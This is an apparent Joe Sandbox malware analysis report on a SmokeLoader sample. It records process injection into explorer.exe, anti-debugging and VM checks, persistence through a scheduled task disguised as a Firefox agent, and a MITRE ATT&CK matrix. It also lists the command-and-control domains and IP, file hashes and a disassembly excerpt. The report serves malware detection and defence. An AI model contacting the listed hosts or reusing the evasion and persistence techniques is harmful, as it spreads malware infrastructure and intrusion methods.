                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411135 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00411135
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040DAC5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040973F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040973F

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: ehddsbh.2.drJump to dropped file
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2951930Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhThread created: unknown EIP: 2991930Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhProcess created: C:\Users\user\AppData\Roaming\ehddsbh C:\Users\user\AppData\Roaming\ehddsbhJump to behavior
                Source: explorer.exe, 00000002.00000000.339640287.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.322434048.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.364225636.00000000086B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.322434048.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.382533218.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.355816034.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                Source: explorer.exe, 00000002.00000000.322434048.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.382533218.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.355816034.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.322434048.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.382533218.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.355816034.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.355218819.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.322151938.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.381974228.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004134ED
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CBB2 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040CBB2

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.0.file.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.file.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ehddsbh.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ehddsbh.5615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.5a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.0.file.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.file.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ehddsbh.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ehddsbh.5615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.5a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                312
                Process Injection
                11
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                12
                Virtualization/Sandbox Evasion
                LSASS Memory331
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                Non-Application Layer Protocol
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)312
                Process Injection
                Security Account Manager12
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Deobfuscate/Decode Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information
                Cached Domain Credentials14
                System Information Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Software Packing
                DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                File Deletion
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 764031 Sample: file.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus detection for URL or domain 2->32 34 Yara detected SmokeLoader 2->34 36 3 other signatures 2->36 7 file.exe 2->7         started        9 ehddsbh 2->9         started        process3 signatures4 12 file.exe 7->12         started        46 Machine Learning detection for dropped file 9->46 15 ehddsbh 9->15         started        process5 signatures6 48 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->48 50 Maps a DLL or memory area into another process 12->50 52 Checks if the current machine is a virtual machine (disk enumeration) 12->52 17 explorer.exe 2 12->17 injected 54 Creates a thread in another existing process (thread injection) 15->54 process7 dnsIp8 26 host-file-host6.com 84.21.172.159, 49704, 80 COMBAHTONcombahtonGmbHDE Germany 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\ehddsbh, PE32 17->22 dropped 24 C:\Users\user\...\ehddsbh:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\ehddsbh100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                6.0.ehddsbh.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                6.0.ehddsbh.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                1.0.file.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.ehddsbh.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.file.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                6.0.ehddsbh.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                6.0.ehddsbh.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.ehddsbh.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                5.2.ehddsbh.5615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.file.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                0.2.file.exe.5a15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.ehddsbh.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                1.0.file.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                1.0.file.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.file.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.2.ehddsbh.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.file.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://host-file-host6.com/0%URL Reputationsafe
                http://host-host-file8.com/100%URL Reputationmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                host-file-host6.com
                84.21.172.159
                truetrue
                  unknown
                  host-host-file8.com
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://host-file-host6.com/true
                    • URL Reputation: safe
                    unknown
                    http://host-host-file8.com/true
                    • URL Reputation: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.322253238.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.355553490.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.382336860.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      84.21.172.159
                      host-file-host6.comGermany
                      30823COMBAHTONcombahtonGmbHDEtrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:764031
                      Start date and time:2022-12-09 10:33:06 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:file.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@6/2@4/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 99.6% (good quality ratio 91.3%)
                      • Quality average: 71.5%
                      • Quality standard deviation: 31.9%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 17
                      • Number of non-executed functions: 15
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                      • Not all processes where analyzed, report is missing behavior information
                      TimeTypeDescription
                      10:35:01Task SchedulerRun new task: Firefox Default Browser Agent F555D525CEDA98ED path: C:\Users\user\AppData\Roaming\ehddsbh
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      84.21.172.159file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      PlW1EFIbvc.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      wlKbhd5bsS.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      host-file-host6.comfile.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      PlW1EFIbvc.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      wlKbhd5bsS.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      COMBAHTONcombahtonGmbHDEfile.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      https://2gfnm.app.link/xHXJIVVbuvbGet hashmaliciousBrowse
                      • 84.21.172.16
                      PlW1EFIbvc.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      https://odggj.app.link/N51hIhDqzvbGet hashmaliciousBrowse
                      • 84.21.172.16
                      wlKbhd5bsS.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      TBN - SUPRAMAX PDA.PDF.jsGet hashmaliciousBrowse
                      • 84.21.172.33
                      181A0E4AA241E1BF7DA338760918724D3D1FB8FE828F2.exeGet hashmaliciousBrowse
                      • 160.20.145.136
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      https://pshoe.app.link/BsaHBSekuvbGet hashmaliciousBrowse
                      • 84.21.172.16
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      file.exeGet hashmaliciousBrowse
                      • 84.21.172.159
                      No context
                      No context
                      Process:C:\Windows\explorer.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):391680
                      Entropy (8bit):5.907475331882966
                      Encrypted:false
                      SSDEEP:6144:Qkf1yLTGbxZo30sCs+D7b8u5tiwhh6K9W92/oF4sded89kTt:XQfGbPGCs2ZNIK9W92/oOac
                      MD5:56DF4686B20D79D1E9070C908DBF9058
                      SHA1:CECEEC6EC094B4979A4B9AC4049A38449982F8B2
                      SHA-256:F6A9C1724ADEBD1E1BC54CB2B2E6CC49B8A6F11910A3B6ACDFC6C5531A1D742B
                      SHA-512:A7D9B82FDBAA18195C2E7E4DF8A81AC4279401E64C9F59A6B5DEAD2B00C204179955AD328D12B7A5B6109D0499A13C3FCA07AF678D899324F8AE87B849BDECE7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......b.................n...........p............@..........................`.......|.......................................s..<............................@......................................0I..@............................................text...Vm.......n.................. ..`.data................r..............@....tutesay.....p.......&..............@..@.nuyus..p............2..............@..@.rsrc................6..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):5.907475331882966
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:391680
                      MD5:56df4686b20d79d1e9070c908dbf9058
                      SHA1:ceceec6ec094b4979a4b9ac4049a38449982f8b2
                      SHA256:f6a9c1724adebd1e1bc54cb2b2e6cc49b8a6f11910a3b6acdfc6c5531a1d742b
                      SHA512:a7d9b82fdbaa18195c2e7e4df8a81ac4279401e64c9f59a6b5dead2b00c204179955ad328d12b7a5b6109d0499a13c3fca07af678d899324f8ae87b849bdece7
                      SSDEEP:6144:Qkf1yLTGbxZo30sCs+D7b8u5tiwhh6K9W92/oF4sded89kTt:XQfGbPGCs2ZNIK9W92/oOac
                      TLSH:5F84D0013284C4F2C7621D77491ACBE1E53BB43BFA346977F7182B6FBEB029195A2215
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......b.................n.
                      Icon Hash:8286dccea68c9c84
                      Entrypoint:0x407096
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x62A586AD [Sun Jun 12 06:24:45 2022 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:eeffe9860bc9c6507e24465b9b5239be
                      Instruction
                      call 00007F7798B6579Ch
                      jmp 00007F7798B5FAFEh
                      mov edi, edi
                      push ebp
                      mov ebp, esp
                      sub esp, 28h
                      xor eax, eax
                      push ebx
                      mov ebx, dword ptr [ebp+0Ch]
                      push esi
                      mov esi, dword ptr [ebp+10h]
                      push edi
                      mov edi, dword ptr [ebp+08h]
                      mov byte ptr [ebp-08h], al
                      mov byte ptr [ebp-07h], al
                      mov byte ptr [ebp-06h], al
                      mov byte ptr [ebp-05h], al
                      mov byte ptr [ebp-04h], al
                      mov byte ptr [ebp-03h], al
                      mov byte ptr [ebp-02h], al
                      mov byte ptr [ebp-01h], al
                      cmp dword ptr [00443324h], eax
                      je 00007F7798B5FC90h
                      push dword ptr [004462C8h]
                      call 00007F7798B646C8h
                      pop ecx
                      jmp 00007F7798B5FC87h
                      mov eax, 0040CC48h
                      mov ecx, dword ptr [ebp+14h]
                      mov edx, 000000A6h
                      cmp ecx, edx
                      jg 00007F7798B5FDFAh
                      je 00007F7798B5FDE1h
                      cmp ecx, 19h
                      jg 00007F7798B5FD7Eh
                      je 00007F7798B5FD6Fh
                      mov edx, ecx
                      push 00000002h
                      pop ecx
                      sub edx, ecx
                      je 00007F7798B5FD53h
                      dec edx
                      je 00007F7798B5FD43h
                      sub edx, 05h
                      je 00007F7798B5FD2Bh
                      dec edx
                      je 00007F7798B5FD0Ch
                      sub edx, 05h
                      je 00007F7798B5FCF3h
                      dec edx
                      je 00007F7798B5FCC7h
                      sub edx, 09h
                      jne 00007F7798B5FE5Ah
                      mov dword ptr [ebp-28h], 00000003h
                      mov dword ptr [ebp-24h], 00401348h
                      fld qword ptr [edi]
                      lea ecx, dword ptr [ebp-28h]
                      fstp qword ptr [ebp-20h]
                      push ecx
                      fld qword ptr [ebx]
                      fstp qword ptr [ebp+00h]
                      Programming Language:
                      • [C++] VS2008 build 21022
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x173c40x3c.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x1a510.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xda4.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49300x40.text
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x16d560x16e00False0.5953829405737705data6.7039529820863955IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x180000x2e2e40x2b400False0.48512576770231214data4.841536392944569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tutesay0x470000xbb80xc00False0.008138020833333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .nuyus0x480000x2700x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x490000x1a5100x1a600False0.6380054058056872data6.252448863423772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x640000x1c120x1e00False0.38958333333333334data3.8825952867996567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      AFX_DIALOG_LAYOUT0x614500x2dataSlovakSlovakia
                      AFX_DIALOG_LAYOUT0x614380x2dataSlovakSlovakia
                      AFX_DIALOG_LAYOUT0x614400xcdataSlovakSlovakia
                      SUXUMOWUDAKOLA0x5f2d00x2107ASCII text, with very long lines (8455), with no line terminatorsSlovakSlovakia
                      RT_CURSOR0x614580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                      RT_CURSOR0x623000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                      RT_CURSOR0x62bd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SlovakSlovakia
                      RT_CURSOR0x62d000xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SlovakSlovakia
